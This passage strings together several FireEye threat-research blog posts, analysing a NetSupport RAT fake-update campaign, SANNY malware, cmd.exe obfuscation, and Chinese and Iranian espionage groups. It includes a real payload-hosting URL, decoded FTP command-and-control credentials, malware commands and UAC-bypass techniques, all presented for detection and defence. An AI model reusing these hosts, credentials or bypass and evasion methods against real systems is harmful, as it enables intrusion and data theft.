The modified pseudocode after running this script is shown in Figure 7.


Figure 7: Assigned values shown as characters

You can find the complete scripts in our FLARE GitHub repository under decompiler scripts

Conclusion

These two admittedly simple examples should be able to give you an idea of the power of IDA’s decompiler API. In this post we have covered the foundations of all decompiler scripts: the ctree object, a structure composed by expressions and statements representing every element of the code as well the relationships between them. By creating a custom visitor we have shown how to traverse the tree and read or modify the code elements, therefore analyzing or modifying the pseudocode.

Hopefully, this post will motivate you to start writing your own scripts. This is only the beginning!

Do you want to learn more about these tools and techniques from FLARE? Then you should take one of our Black Hat classes in Las Vegas this summer! Our offerings include Malware Analysis Crash Course, macOS Malware for Reverse Engineers, and Malware Analysis Master Class.

References

Although written in 2009, one of the best references is still the original article on the Hex-Rays blog.

Fake Software Update Abuses NetSupport Remote Access Tool

Over the last few months, FireEye has tracked an in-the-wild campaign that leverages compromised sites to spread fake updates. In some cases, the payload was the NetSupport Manager remote access tool (RAT). NetSupport Manager is a commercially available RAT that can be used legitimately by system administrators for remotely accessing client computers. However, malicious actors are abusing this application by installing it to the victims’ systems without their knowledge to gain unauthorized access to their machines. This blog details our analysis of the JavaScript and components used in instances where the identified payload was NetSupport RAT.

Infection Vector

The operator behind these campaigns uses compromised sites to spread fake updates masquerading as Adobe Flash, Chrome, and FireFox updates. When users navigate to the compromised website, the malicious JavaScript file is downloaded, mostly from a DropBox link. Before delivering the payload, the JavaScript sends basic system information to the server. After receiving further commands from the server, it then executes the final JavaScript to deliver the final payload. In our case, the JavaScript that delivers the payload is named Update.js, and it is executed from %AppData% with the help of wscript.exe. Figure 1 shows the infection flow.


Figure 1: Infection Flow

In-Depth Analysis of JavaScript

The initial JavaScript file contains multiple layers of obfuscation. Like other malicious scripts, the first layer has obfuscation that builds and executes the second layer as a new function. The second layer of the JavaScript contains the dec function, which is used to decrypt and execute more JavaScript code. Figure 2 shows a snapshot of the second layer.


Figure 2: Second Layer of Initial JavaScript File

In the second JavaScript file, the malware author uses a tricky method to make the analysis harder for reverse engineers. The author uses the caller and callee function code to get the key for decryption. During normal JavaScript analysis, if an analyst finds any obfuscated script, the analyst tries to de-obfuscate or beautify the script for analysis. JavaScript beautification tools generally add line breaks and tabs to make the script code look better and easier to analyze. The tools also try to rename the local variables and remove unreferenced variables and code from the script, which helps to analyze core code only.

But in this case, since the malware uses the caller and callee function code to derive the key, if the analyst adds or removes anything from the first or second layer script, the script will not be able to retrieve the key and will terminate with an exception. The code snippet in Figure 3 shows this trick.


Figure 3: Anti-Analysis Trick Implemented in JavaScript (Beautified Code)

The code decrypts and executes the JavaScript code as a function. This decrypted function contains code that initiates the network connection. In the decoded function, the command and control (C2) URL and a value named tid are hard-coded in the script and protected with some encoded function.

During its first communication to the server, the malware sends the tid value and the current date of the system in encoded format, and waits for the response from the server. It decodes the server response and executes the response as a function, as shown in Figure 4.


Figure 4: Initial Server Communication and Response

The response from the server is JavaScript code that the malware executes as a function named step2.

The step2 function uses WScript.Network and Windows Management Instrumentation(WMI) to collect the following system information, which it then encodes and sends to the server:

Architecture, ComputerName, UserName, Processors, OS, Domain, Manufacturer, Model, BIOS_Version, AntiSpywareProduct, AntiVirusProduct, MACAddress, Keyboard, PointingDevice, DisplayControllerConfiguration, ProcessList;

After sending the system information to the server, the response from the server contains two parts: content2 and content3.

The script (step2 function) decodes both parts. The decoded content3 part contains the function named as step3, as shown in Figure 5.


Figure 5: Decrypting and Executing Response step3

The step3 function contains code that writes decoded content2 into a %temp% directory as Update.js. Update.js contains code to download and execute the final payload. The step3 function also sends the resulting data, such as runFileResult and _tempFilePath, to the server, as shown in Figure 6.


Figure 6: Script to Drop and Execute Update.js

The Update.js file also contains multi-layer obfuscation. After decoding, the JavaScript contains code to drop multiple files in %AppData%, including a 7zip standalone executable (7za.exe), password-protected archive (Loglist.rtf), and batch script (Upd.cmd). We will talk more about these components later.

JavaScript uses PowerShell commands to download the files from the server. It sets the attribute’s execution policy to bypass and window-style to hidden to hide itself from the end user.

Components of the Attack

Figure 7 shows the index of the malicious server where we have observed the malware author updating the script content.


Figure 7: Index of Malicious Server

  • 7za.exe: 7zip standalone executable
  • LogList.rtf: Password-protected archive file
  • Upd.cmd: Batch script to install the NetSupport Client
  • Downloads.txt: List of IPs (possibly the infected systems)
  • Get.php: Downloads LogList.rtf
Upd.cmd

This file is a batch script that extracts the archive file and installs the remote control tool on the system. The script is obfuscated with the variable substitution method. This file was regularly updated by the malware during our analysis.

After de-obfuscating the script, we can see the batch commands in the script (Figure 8).


Figure 8: De-Obfuscated Upd.cmd Script

The script performs the following tasks:

  1. Extract the archive using the 7zip executable with the password mentioned in the script.
  2. After extraction, delete the downloaded archive file (loglist.rtf).
  3. Disable Windows Error Reporting and App Compatibility.
  4. Add the remote control client executable to the firewall’s allowed program list.
  5. Run remote control tool (client32.exe).
  6. Add Run registry entry with the name “ManifestStore” or downloads shortcut file to Startup folder.
  7. Hide the files using attributes.
  8. Delete all the artifacts (7zip executable, script, archive file).

Note: While analyzing the script, we found some typos in the script (Figure 9). Yes, malware authors make mistakes too. This script might be in beta phase. In the later version of script, the author has removed these typos.


Figure 9: Registry Entry Bloopers

Artifact Cleaning

As mentioned, the script contains code to remove the artifacts used in the attack from the victim’s system. While monitoring the server, we also observed some change in the script related to this code, as shown in Figure 10.


Figure 10: Artifact Cleaning Commands

The highlighted command in one of the variants indicates that it might drop or use this file in the attack. The file could be a decoy document.

Persistence Mechanism

During our analysis, we observed two variants of this attack with different persistence mechanisms.

In the first variant, the malware author uses a RUN registry entry to remain persistent in the system.

In the second variant, the malware author uses the shortcut file (named desktop.ini.lnk), which is hosted on the server. It downloads the shortcut file and places it into the Startup folder, as shown in Figure 11.


Figure 11: Downloading Shortcut File

The target command for the shortcut file points to the remote application “client32.exe,” which was dropped in %AppData%, to start the application on startup.

LogList.rtf

Although the file extension is .rtf, the file is actually a 7zipped archive. This archive file is password-protected and contains the NetSupport Manager RAT. The script upd.cmd contains the password to extract the archive.

The major features provided by the NetSupport tool include:

  • Remote desktop
  • File transfer
  • Remote inventory and system information
  • Launching applications in client’s machine
  • Geolocation
Downloads.txt

This file contains a list of IP addresses, which could be compromised systems. It has IPs along with User-agent. The IP addresses in the file belong to various regions, mostly the U.S., Germany, and the Netherlands.

Conclusion

RATs are widely used for legitimate purposes, often by system administrators. However, since they are legitimate applications and readily available, malware authors can easily abuse them and sometimes can avoid user suspicion as well.

The FireEye HX Endpoint platform successfully detects this attack at the initial phase of the attack cycle.

Acknowledgement

Thanks to my colleagues Dileep Kumar Jallepalli, Rakesh Sharma and Kimberly Goody for their help in the analysis.

Indicators of Compromise

Registry entries

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run :  ManifestStore

HKCU\Software\SeX\KEx

Files

%AppData%\ManifestStore\client32.exe

%AppData%\ManifestStore\client32.ini

%AppData%\ManifestStore\HTCTL32.DLL

%AppData%\ManifestStore\msvcr100.dll

%AppData%\ManifestStore\nskbfltr.inf

%AppData%\ManifestStore\NSM.ini

%AppData%\ManifestStore\NSM.LIC

%AppData%\ManifestStore\nsm_vpro.ini

%AppData%\ManifestStore\pcicapi.dll

%AppData%\ManifestStore\PCICHEK.DLL

%AppData%\ManifestStore\PCICL32.DLL

%AppData%\ManifestStore\remcmdstub.exe

%AppData%\ManifestStore\TCCTL32.DLL

%AppData%\systemupdate\Whitepaper.docx

Shortcut file

            %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.lnk

Firewall program entry allowing the following application

            %AppData%\ManifestStore\client32.exe

Running process named “client32.exe” from the path “%AppData%\ManifestStore\client32.exe”

Hashes

The following hashes are JavaScript files that use the same obfuscation techniques described in the blog:

fc87951ae927d0fe5eb14027d43b1fc3

e3b0fd6c3c97355b7187c639ad9fb97a

a8e8b2072cbdf41f62e870ec775cb246

6c5fd3258f6eb2a7beaf1c69ee121b9f

31e7e9db74525b255f646baf2583c419

065ed6e04277925dcd6e0ff72c07b65a

12dd86b842a4d3fe067cdb38c3ef089a

350ae71bc3d9f0c1d7377fb4e737d2a4

c749321f56fce04ad8f4c3c31c7f33ff

c7abd2c0b7fd8c19e08fe2a228b021b9

b624735e02b49cfdd78df7542bf8e779

5a082bb45dbab012f17120135856c2fc

dc4bb711580e6b2fafa32353541a3f65

e57e4727100be6f3d243ae08011a18ae

9bf55bf8c2f4072883e01254cba973e6

20a6aa24e5586375c77b4dc1e00716f2

aa2a195d0581a78e01e62beabb03f5f0

99c7a56ba04c435372bea5484861cbf3

8c0d17d472589df4f597002d8f2ba487

227c634e563f256f396b4071ffda2e05

ef315aa749e2e33fc6df09d10ae6745d

341148a5ef714cf6cd98eb0801f07a01

M-Trends 2018

What have incident responders observed and learned from cyber attacks in 2017? Just as in prior years, we have continued to see the cyber security threat landscape evolve. Over the past twelve months we have observed a number of new trends and changes to attacks, but we have also seen how certain trends and predictions from the past have been confirmed or even reconfirmed.

Our 9th edition of M-Trends draws upon the findings of one year of incident response investigations across the globe. This data provides us with insights into the evolution of nation-state sponsored threat actors, new threat groups, and new trends and attacker techniques we have observed during our investigations. We also compare this data to past observations from prior M-Trends reports and continue our tradition of reporting on key metrics and their development over time.

Some of the topics we cover in the 2018 M-Trends report include:

  • How the global median time from compromise to internal discovery has dropped from 80 days in 2016 to 57.5 in 2017.
  • The increase of attacks originating from threat actors sponsored by Iran.
  • Metrics about attacks that have retargeted or even recompromised prior victim organizations, a topic we previously discussed in our 2013 edition of M-Trends.
  • The widening cyber security skills gap and the rising demand for skilled personnel capable of meeting the challenges posed by today’s more sophisticated threat actors.
  • Frequently observed areas of weaknesses in security programs and their relation to security incidents.
  • Observations and lessons we have learned from our red teaming exercises about the effectiveness and gaps of common security controls.

By sharing this report with the security community, we continue our tradition of providing security professionals with insights and knowledge gained from recent breaches. We hope that you find this report useful in your work to strengthen your security posture and defend against the ever evolving threats.

SANNY Malware Delivery Method Updated in Recently Observed Attacks

Introduction

In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.

As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.

Document Details

The following two documents, detailed below, have been observed in the latest round of attacks:

MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc

The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.


Figure 1: Sample document written in Russian

MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc

The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).


Figure 2: Sample document written in English

Macro Analysis

In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.

Stage 1: BAT File Download

In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.

There were a few interesting observations in the command line:

  1. The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
  2. The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3.  The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.


Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate

BAT File Analysis

Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.

  • For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
  • For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt

Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (component inside setup.cab).

  • For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
  • For a 64-bit operating system: rundll32 update.dll EntryPoint

For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:

The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:

Stage 2: CAB File Analysis

As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.

The CAB file contains the following components:

  • install.bat – BAT file used to deploy and execute the components.
  • ipnet.dll – Main component that we refer to as SANNY malware.
  • ipnet.ini – Config file used by SANNY malware.
  • NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
  • update.dll – Performs UAC bypass on Windows 10.

install.bat will perform the following essential activities:

  1. Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:



  2. Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application) by first stopping this service, and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started:



  3. After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file:

ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:

  1. ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
  2. Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.

The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:

  1. Deletes the module NTWDBLIB.DLL from the disk using the following command:

    cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

  2. Sets the code page on the system to 65001, which corresponds to UTF-8:

    cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

Command and Control (C2) Communication

SANNY malware uses the FTP protocol as the C2 communication channel.

FTP Config File

The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.

This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8

Upon decoding the file, the following credentials can be recovered:

  • FTP Server: ftp.capnix[.]com
  • Username: cnix_21072852
  • Password: vlasimir2017

It then continues to perform the connection to the FTP server decoded from the aforementioned config file, and sets the current directory on the FTP server as “htdocs” using the FtpSetCurrentDirectoryW function.

System Information Collection

For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.

System information is gathered from the machine using the following command:

The list of running tasks on the system is gathered by executing the following command:

C2 Commands

After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.

Upon discovery of the file with the “to everyone” substring, the malware will download the file and then performs actions based on the following command names:

  • chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip commands allows the attacker to migrate malware to a new FTP C2 server. The command has the following syntax: 



  • pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:

The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.

  • put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:

  • default command: If the command begins with the substring “cmd /c”, but it is not followed by either of the previous commands (chip, pull, and put), then it directly executes the command on the machine using WinExec.
  • /user command: This command will execute a command on the system as the logged in user. The command duplicates the access token of “explorer.exe” and spawns a process using the following steps:

    1. Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
    2. Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
    3. Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.

C2 Command

Purpose

chip

Update the FTP server config file

pull

Upload a file from the machine

put

Copy an existing file to a new destination

/user

Create a new process with explorer.exe access token

default command

Execute a program on the machine using WinExec()

Compression and Encoding Data

SANNY malware uses an interesting mechanism for compressing the contents of data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:

  1. Creates an empty ZIP file with the name: temp.zip in the %temp% directory.
  2. Writes the first 16 bytes of the PK header to the ZIP file.
  3. Calls the CopyHere method of IShellDispatch interface to compress the collected data and write to temp.zip.
  4. Reads the contents of temp.zip to memory.
  5. Deletes temp.zip from the disk.
  6. Creates an empty file, post.txt, in the %temp% directory.
  7. The temp.zip file contents are Base64 encoded (using the same custom character set mentioned in the previous FTP Config File section) and written to the file: %temp%\post.txt.
  8. Calls the FtpPutFileW function to write the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”

Execution on Windows 7 and User Account Control (UAC) Bypass

NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.

The purpose of this DLL module is to launch the install.bat file. The file cliconfg.exe is a legitimate Windows binary (SQL Client Configuration Utility), loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and results in a UAC bypass.

Execution on Windows 10 and UAC Bypass

Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.

The main actions performed by update.dll are as follows:

  1. Executes the following commands to setup the Windows registry for UAC bypass:



  2. Leverages a UAC bypass technique that uses the legitimate Windows binary, fodhelper.exe, to perform the UAC bypass on Windows 10 so that the install.bat file is executed with elevated privileges:



  3. Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system:

Conclusion

This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.

Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

SHA256 Hash

Original Filename

b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4

РГНФ 2018-2019.doc

e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1

 

Copy of communication from Security Council Committee (1718).doc

eb394523df31fc83aefa402f8015c4a46f534c0a1f224151c47e80513ceea46f

1.bat

a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170

Setup.cab (64-bit)

a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113

Setup.cab (32-bit)

DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques

Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages.

However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules.

In this DOSfuscation white paper, first presented at Black Hat Asia 2018, I showcase nine months of research into several facets of command line argument obfuscation that affect static and dynamic detection approaches. Beginning with cataloguing a half-dozen characters with significant obfuscation capabilities (only two of which I have identified being used in the wild), I then highlight the static detection evasion capabilities of environment variable substring encoding. Combining these techniques, I unveil four never-before-seen payload obfuscation approaches that are fully compatible with any input command on cmd.exe's command line. These obfuscation capabilities de-obfuscate in the current cmd.exe session for both interactive and noninteractive sessions, and avoid all command line logging. Finally, I discuss the building blocks required for these new encoding and obfuscation capabilities and outline several approaches that defenders can take to begin detecting this genre of obfuscation.

As a Senior Applied Security Researcher with FireEye's Advanced Practices Team, I am tasked with researching, developing and deploying new detection capabilities to FireEye's detection platform to stay ahead of advanced threat actors and their ever-changing tactics, techniques and procedures. FireEye customers have been benefiting from multiple layers of innovative obfuscation detection capabilities developed and deployed over the past nine months as a direct result of this research.

Download the DOSfuscation white paper today.

Daniel Bohannon (@danielhbohannon) is a Senior Applied Security Researcher on FireEye's Advanced Practices Team.

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of probably compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.

Implications

The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.

Indicators

File

Hash

Description

x.js

3fefa55daeb167931975c22df3eca20a

HOMEFRY, a 64-bit Windows password dumper/cracker

mt.exe

40528e368d323db0ac5c3f5e1efe4889

MURKYTOP, a command-line reconnaissance tool 

com4.js

a68bf5fce22e7f1d6f999b7a580ae477

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators

File

Hash

Description

green.ddd

3eb6f85ac046a96204096ab65bbd3e7e

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

BGij

6e843ef4856336fe3ef4ed27a4c792b1

Beacon, a commercially available backdoor

msresamn.ttf

a9e7539c1ebe857bae6efceefaa9dd16

PHOTO, also reported as Derusbi

1024-aa6a121f98330df2edee6c4391df21ff43a33604

bd9e4c82bf12c4e7a58221fc52fed705

BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign

Introduction

From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass, and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.


Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe. The process chain is shown in Figure 2.


Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.


Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks involved in this campaign are macro-based documents sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:


Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. What follows is four examples, and a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.


Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.


Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.


Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.


Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files in a hard coded path: C:\programdata. Since the path is hard coded, the execution will only be observed in operating systems, Windows 7 and above. The following are the three files:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

